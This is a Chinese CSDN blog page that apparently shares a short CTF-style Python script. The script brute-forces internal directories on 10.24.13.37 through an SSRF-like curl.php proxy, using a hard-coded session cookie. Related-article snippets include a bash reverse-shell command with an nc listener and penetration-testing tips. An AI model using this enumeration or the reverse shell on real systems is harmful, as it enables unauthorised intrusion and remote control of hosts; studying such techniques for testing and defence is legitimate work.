常见渗透py脚本

最新推荐文章于 2024-05-13 02:49:34 发布
最新推荐文章于 2024-05-13 02:49:34 发布
阅读量784 收藏
点赞数
分类专栏: python相关代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p656456564545/article/details/50836197
版权

http://p6.qhimg.com/t0170ec7638e15c209c.jpg

//爆破篇章

import requests
headers = {
    'Cookie': 'PHPSESSID=cfefaa8e1d72885a3de880a9c9c55337'
}
url = 'http://vpn.sycsec.com/curl.php'
url_2 = 'http://10.24.13.37/files/'
data = {
    'option': 'GET',
    'url': '',
    'cookie': '',
    'post': '',
}
for i in range(0,84):
    data['url'] = '%sSYC0%02d/' % (url_2, i)
    print 'Forbidden' in requests.post(url, headers=headers, data=data).content, i

爬虫仔蛙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透常见shell反弹姿势
RuoLi_s的博客
11-28 795
常见反弹shell总结: 一、bash反弹 通用 ① 在kali机里面开启端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 ② 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 ③ 解释 bash -i: 打开一个交互的bash .>&: 标准错误输出重定向到标准输出 /dev/tcp/x.x.x.x/port : 意为调
web渗透常见漏洞总结
gugonggugong的博客
01-14 3479
一、SQL注入 1. 原理 SQL:结构化查询语言 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注射能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击;如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入。 2. 不同数据库的注入 MySQL access...
使用python编写一个简单的渗透脚本
qq_45766062的博客
12-14 7211
信息收集概要 为什么越厉害的黑客越在意信息收集的过程,因为信息收集的完整性直接决定了渗透测试的结果。信息收集是指黑客为了更加有效地实施渗透攻击而在攻击前或攻击过程中对目标的所有探测活动。 信息收集的作用 1.了解组织安全架构 2.缩小攻击范围 3.描绘网络拓扑 4.建立脆弱点数据库 信息收集分类 (1)主动信息搜集:与目标主机进行直接交互,从而拿到目标信息,缺点是会记录自己的操作信息。 (2)被动信息搜集:不与目标主机进行直接交互,通过搜索引擎或者社会工程等方式间接的获取目标主机的信息。 常用的信息收集方法
python脚本渗透测试)_渗透测试常用python脚本有哪些
最新发布
2401_84972627的博客
05-13 227
crypt这个模块只能在Linux下才能运行,此外,密码文件需要自己定义,爆破的成功率取决于字典的强大实验效果。
推荐几款渗透测试常用的脚本(记得收藏)
保持微笑的博客
05-02 5965
1.dirsearch目录扫描 2.OneForAll-master资产收集 3.sqlmap 4.awvs批量扫描 5.ip解码 注意:在使用之前将自己的电脑先安装好python2x和python3x的环境。 下载链接: 链接:https://pan.baidu.com/s/1Tz_pd7I6zsrKd5IaXGu6zQ 提取码:wsvu --来自百度网盘超级会员V2的分享 1.dirsearch目录扫描 Dirsearch是一个用于探测WEB服务器下的敏感文件/目录的命令行...
渗透测试常见漏洞说明资料
weixin_51541190的博客
08-26 3374
文件上传漏洞、远程命令执行、SQL注入、sqlmap自动化测试、waf验证与绕过
渗透测试之分享常用工具、插件和脚本(干货)
保持微笑的博客
10-31 3851
BRUP插件:漏洞挖掘插件:Autorize、CSRF Token Tracker、XSS Validator、Turbo Intruder辅助插件:HaE、sqlmap4brup++、hackbar、Software Vulnerability Scanner浏览器插件: wappalyzer、MySSL、Cookie Editor脚本:1.图形化渗透测试工具集——GUI_Tools5.ip解码6.awvs批量扫描。
内网渗透技巧大全
黑战士的博客
04-28 1384
对于内部帐户,SPN将自动进行注册。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system。安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。
Kali常见攻击手段
热门推荐
weixin_45565886的博客
02-07 2万+
Kali常见攻击手段
渗透测试学习笔记
山己见的博客
11-04 5220
本文只做学习用途,严禁利用本文提到的技术进行非法攻击,否则后果自负,本人不承担任何责任。 信息收集 收集域名信息 Whois查询 kali:whois baidu.com 爱站工具网:https://whois.aizhan.com 站长之家:http://whois.chinaz.com VirusTotal:https://www.virustotal.com 备案信息查询 ICP备案查询网:http://www.beianbeian.com 天眼查:http://www.tianyancha.
python工具集合脚本.zip
12-16
2. **fuzz.py** - "fuzzing"是一种常见的安全测试技术,通过发送随机或变异的数据来检测程序的漏洞。这个脚本可能是用于模糊测试,尝试找出软件中的漏洞。 3. **xxsj_nw.py** - 这个脚本可能是在网络层面的信息搜集...
python脚本扫描网站后台.zip
12-31
2. **路径枚举**:脚本可能包含一个目录词典或列表,包含常见的后台路径,如"/admin/"、"/login/"等。它会尝试对这些路径进行遍历,以发现可能的后台入口。 3. **参数处理**:描述中提到的`-i + url`,其中`-i`可能...
Immunity Debugger 是一款逆向工程调试器,Mona.py 是一个 Windows 平台上的漏洞利用开发辅助工具
01-13
Mona.py 是一个 Windows 平台上的漏洞利用开发辅助工具,它可以自动化执行许多常见的漏洞利用任务,例如寻找漏洞、生成 shellcode、构造 payload 等。Mona.py 还提供了一些实用的功能,例如模块信息收集、SEH 链分析...
python爬取网站url脚本——JSFinder.zip
12-31
JSFinder的命令行用法是"python JSFinder.py -u + ip",这表明它是一个命令行工具,需要指定目标URL(IP地址)来运行。在命令行中,"-u"参数通常用于传递URL,而"+ ip"可能是为了直接输入目标网站的IP地址,避免DNS...
人工智能-项目实践-检测-在渗透测试中快速检测常见中间件、组件的高危漏洞.zip
12-23
人工智能-项目实践-检测-在渗透测试中快速检测常见中间件、组件的高危漏洞 vulnerability-list 常见漏洞快速检测,目前包含以下漏洞的检测。 测试环境为win10,python3。 使用前需安装相关库:py -3 -m pip install...
一个很好的python代理脚本(给sqlmapapi发送请求的玩意),函数可以参考拿着用呗
p656456564545的专栏
08-18 2411
req2sqlmap.py   #encoding=utf-8 import urllib import urllib2 import re import  json from urlparse import urlparse   #每一个分布式客户端需要又一个唯一的clientid,否则会引起冲突 #如果重启代理,相当于添加一个新的client,因此也需要更换clientid ClintId="
python检测SQL注入的相关代码(参考lijiejie)
p656456564545的专栏
01-04 2278
mysql:    post注入相关http://www.wooyun.org/bugs/wooyun-2010-082219    mssql:   http://www.wooyun.org/bugs/wooyun-2010-081815 oracle:     http://www.wooyun.org/bugs/wooyun-2010-082564 关于不同的
python常见错误
p656456564545的专栏
04-05 1719
一、常见难点 索引: 字符串方法的灵活使用 字符串格式化 Unicode 字符 Python乱码问题 字符串与列表转换问题 列表类型内建函数灵活应用 二、逐一击破 1、字符串方法的灵活使用 Python字符串内建方法在《Python核心编程》列举的很全面,这里不再累述,就总结以下常用的。 (1)、string.capital
vsftp2.3.4 py脚本
12-10
py脚本则是一种使用Python编程语言编写的脚本文件。在vsftp2.3.4中使用py脚本可以实现一些额外的功能扩展,比如自定义用户登录验证、日志记录、限速等。 通过编写py脚本,可以实现对vsftp2.3.4的定制化配置,例如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值